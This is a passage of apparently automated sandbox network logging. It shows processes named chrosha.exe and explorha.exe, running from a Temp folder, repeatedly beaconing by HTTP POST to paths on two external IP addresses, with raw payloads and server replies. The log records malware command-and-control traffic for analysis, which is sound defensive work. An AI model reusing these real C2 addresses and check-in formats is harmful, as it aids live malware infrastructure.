                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:17.114401102 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      94192.168.2.549921193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:17.261063099 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:17.510898113 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:17.511830091 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:17.765737057 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      95192.168.2.549922193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:17.365765095 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:17.616955996 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      96192.168.2.549927193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:17.972577095 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:18.216613054 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      97192.168.2.549928193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:18.131050110 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:18.377362013 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:18.382152081 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:18.632913113 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      98192.168.2.549930193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:18.462346077 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:18.706995010 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      99192.168.2.549931193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:18.992307901 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:19.237154007 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:19.239578009 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:19.492469072 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      100192.168.2.549932193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:19.071513891 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:19.320133924 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      101192.168.2.549933193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:19.573605061 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:19.824693918 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      102192.168.2.549934193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:19.846642971 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:20.090818882 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:20.091675997 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:20.341702938 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      103192.168.2.549935193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:20.204092979 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:20.455960035 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      104192.168.2.549936193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:20.694490910 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:20.943108082 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:20.949634075 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:21.202567101 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      105192.168.2.549937193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:20.709148884 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
